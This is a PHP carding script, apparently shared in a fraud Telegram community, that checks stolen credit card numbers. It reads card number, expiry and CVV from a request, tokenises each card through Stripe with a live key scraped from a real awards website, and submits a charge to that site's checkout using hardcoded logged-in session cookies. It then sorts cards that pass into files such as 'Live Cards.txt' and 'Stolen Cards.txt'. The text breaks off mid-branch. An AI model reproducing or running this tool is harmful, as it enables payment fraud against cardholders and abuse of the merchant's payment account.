<?php
/// Link of the site:[......]/////
/// Made by Abbey Saale
/// Join @KillAliexpress & @KillAliexpressChat for more...
/// This 2 req Proxyless RAW API Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁 ™】
error_reporting(0);
set_time_limit(0);
error_reporting(0);
date_default_timezone_set('America/Buenos_Aires');
function multiexplode($delimiters, $string){
$one = str_replace($delimiters, $delimiters[0], $string);
$two = explode($delimiters[0], $one);
return $two;}
$lista = $_GET['lista'];
$cc = multiexplode(array(":", "|", ""), $lista)[0];
$mon = multiexplode(array(":", "|", ""), $lista)[1];
$year = multiexplode(array(":", "|", ""), $lista)[2];
$cvv = multiexplode(array(":", "|", ""), $lista)[3];
if(strlen($year) == 2){
$year = substr($year, -2);}
else{
$year = substr($year, 2);}
function GetStr($string, $start, $end){
$str = explode($start, $string);
$str = explode($end, $str[1]);
return $str[0];}
function saveCCN($cc) { 
$file = dirname(FILE) . "/CCN Lives.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveLive($cc) { 
$file = dirname(FILE) . "/Live Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveCVV($cc) { 
$file = dirname(FILE) . "/CVV Lives.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveStolenLives($cc) { 
$file = dirname(FILE) . "/Stolen Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function savePickupLives($cc) { 
$file = dirname(FILE) . "/Pickup Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveLostLives($cc) { 
$file = dirname(FILE) . "/Lost Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveZipLives($cc) { 
$file = dirname(FILE) . "/Incorrect Zip Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveInsufficientLives($cc) { 
$file = dirname(FILE) . "/Insufficient Fund Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp);}
/////////////////////////////////////BIN LOOKUP START////////////////////////////////////////////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: lookup.binlist.net',
'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '');
$fim = curl_exec($ch);
$bank = getStr($fim, '"bank":{"name":"', '"');
$name = getStr($fim, '"name":"', '"');
$brand = getStr($fim, '"brand":"', '"');
$country = getStr($fim, '"country":{"name":"', '"');
$scheme = getStr($fim, '"scheme":"', '"');
$currency = getStr($fim, '"currency":"', '"');
$emoji = getStr($fim, '"emoji":"', '"');
$type = getStr($fim, '"type":"', '"');
if(strpos($fim, '"type":"credit"') !== false) {
$bin = 'Credit';
}else{
$bin = 'Debit';}
/////////////////////////////////////BIN LOOKUP END////////////////////////////////////////////////////////////////
//----------------------------------------------------------------------------------------------------------------------//
$first = str_shuffle("ZELTRAX");
$last = str_shuffle("ROCKZ");
$first1 = str_shuffle("zeltrax85246");
$email = "".$first1."%40gmail.com";
$address = "".rand(0000,9999)."+Main+Street";
$phone = rand(0000000000,9999999999);
$country = "US";
$st = array("AL","NY","CA","FL","WA");
$st1 = array_rand($st);
$state = $st[$st1];
if ($state == "NY"){
$zip = "10080";
$city = "New+York";}
elseif ($state == "WA"){
$zip = "98001";
$city = "Auburn";}
elseif ($state == "AL"){
$zip = "35005";
$city = "Adamsville";}
elseif ($state == "FL"){
$zip = "32003";
$city = "Orange+Park";}
else{
$zip = "90201";
$city = "Bell";};
//----------------------------------------------------------------------------------------------------------------------//
////////////////////////////////////===[For Authorizing Cards]////////////////////////////////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/payment_methods');
curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(  
'authority: api.stripe.com',
'accept: application/json',
'accept-language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,hi;q=0.6',
'content-type: application/x-www-form-urlencoded',
'origin: https://js.stripe.com',
'referer: https://js.stripe.com/v3/controller-2360f24418c95d95248b5dc78e7a3298.html',
'sec-fetch-dest: empty',
'sec-fetch-mode: cors',
'sec-fetch-site: same-site'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
//========================================================================================================================//
//========================================================================================================================//
curl_setopt($ch, CURLOPT_POSTFIELDS, 'type=card&billing_details[address][line1]=Box+22+Ave&billing_details[address][city]=New+York&billing_details[address][country]=US&billing_details[address][state]=NY&billing_details[address][postal_code]=10026&billing_details[name]=Nalla+Boy&card[number]='.$cc.'&card[cvc]='.$cvv.'&card[exp_month]='.$mon.'&card[exp_year]='.$year.'&guid=090ce4bd-0d7d-48d9-9778-6240ec28d8f5b51423&muid=c736b3c7-80ba-4f2b-8e00-a4ba42bbf7b6c9070b&sid=972f0e45-18b6-47c1-9a35-f8e2daaf9b6c48ec3f&payment_user_agent=stripe.js%2Fa704c85b%3B+stripe-js-v3%2Fa704c85b&time_on_page=31060&referrer=https%3A%2F%2Fwww.theglobalbeautyawards.com%2Fregister%2Fvip-pro-membership-voting-member%2F%3Faction%3Dcheckout%26txn%3D12a&key=pk_live_51ApPtxFPpj3pFH5FOHwDQ369PF3siMxSCrIrbjMmeVTuqK5An412vgO60dvkLHbrLb93Fqg0Hli8s7otnn4gHOSM00npmrzCgX');
//========================================================================================================================//
//========================================================================================================================//
$result = curl_exec($ch);
$token = trim(strip_tags(getStr($result,'"id": "','"')));
////////////////////////////===============[For Charging Cards]=============////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://www.theglobalbeautyawards.com/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'authority: www.theglobalbeautyawards.com',
'accept: application/json, text/javascript, */*; q=0.01',
'cookie: wordpress_sec_f0272bf3ac0453652cab5e90c2869d5e=nallaboy822%40gmail.com%7C1600661424%7CbMCmzGw2fHgIPPtiuAMHZZW0QKDwYi4Kb83Zo1E8sVU%7Cecd06ff0c23b591f667300770218ee9cbe275685697fc338d3f8bc4bd6f093c2;__cfduid=d17afd60114d6fb884a851bca4f269fad1600483620;_ga=GA1.2.1336425559.1600483632;_gid=GA1.2.7687811.1600483632;PHPSESSID=726b8ac772efe472c5d653ebb8d8e73c;wordpress_logged_in_f0272bf3ac0453652cab5e90c2869d5e=nallaboy822%40gmail.com%7C1600661424%7CbMCmzGw2fHgIPPtiuAMHZZW0QKDwYi4Kb83Zo1E8sVU%7Cc8a78150122e8a24c97ec525c0ee8e8ff8c491cd4faadd6c7c23db7c36b5d3e1;wordpress_cf_adm_use_adm=1;__stripe_mid=c736b3c7-80ba-4f2b-8e00-a4ba42bbf7b6c9070b;__stripe_sid=972f0e45-18b6-47c1-9a35-f8e2daaf9b6c48ec3f',
'accept-language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7,hi;q=0.6',
'content-type: application/x-www-form-urlencoded; charset=UTF-8',
'origin: https://www.theglobalbeautyawards.com',
'referer: https://www.theglobalbeautyawards.com/register/vip-pro-membership-voting-member/?action=checkout&txn=12a',
'sec-fetch-dest: empty',
'sec-fetch-mode: cors',
'sec-fetch-site: same-origin'));
//========================================================================================================================//
//========================================================================================================================//
curl_setopt($ch, CURLOPT_POSTFIELDS, 'mepr_transaction_id=1378&address_required=1&card-address-one=Box+22+Ave&card-address-two=&card-address-city=New+York&card-address-country=US&card-address-state=NY&card-address-zip=10028&card-name=Nalla+Boy&payment_method_id='.$token.'&action=mepr_stripe_confirm_payment&mepr_current_url=https%3A%2F%2Fwww.theglobalbeautyawards.com%2Fregister%2Fvip-pro-membership-voting-member%2F%3Faction%3Dcheckout%26txn%3D12a%23mepr_jump');
//========================================================================================================================//
//========================================================================================================================//
$result = curl_exec($ch);
//////////////////////////////////==============[Card Response Start]================///////////////////////////////////////
if(strpos($result, '/donations/thank_you?donation_number=','')){saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, '"cvc_check":"pass"')){saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = CVC Check Pass </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "Thank You For Donation.")) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "Thank You.")) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'"status":"succeeded"')){saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Succeeded </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card zip code is incorrect.')) {saveZipLives ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your card zip code is incorrect </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_zip")) {saveZipLives ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Incorrect Zip </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "Your payment has already been processed")) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
  echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your payment has already been processed </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"The zip code you supplied failed validation.")){saveZipLives ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = The zip code you supplied failed validation </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "Success")){saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Success </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "succeeded.")) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Succeeded </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'"type":"one-time"')){saveCVV ("Live Card -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = One Time </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = Abbey Saale</span></br><span class="badge badge-yellow">Telegram Username = @AbbeySaale</span></br><span class="badge badge-yellow">Channel Link = @KillAliexpress</span></br><span class="badge badge-yellow">Group link = @KillAliexpressChat</span></br><span class="badge badge-yellow"></span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card has insufficient funds.')) {saveInsufficientLives ("Live Card (Insufficient Card) -> $cc|$mon|$year|$cvv | Checker Made By Abbey Saale");
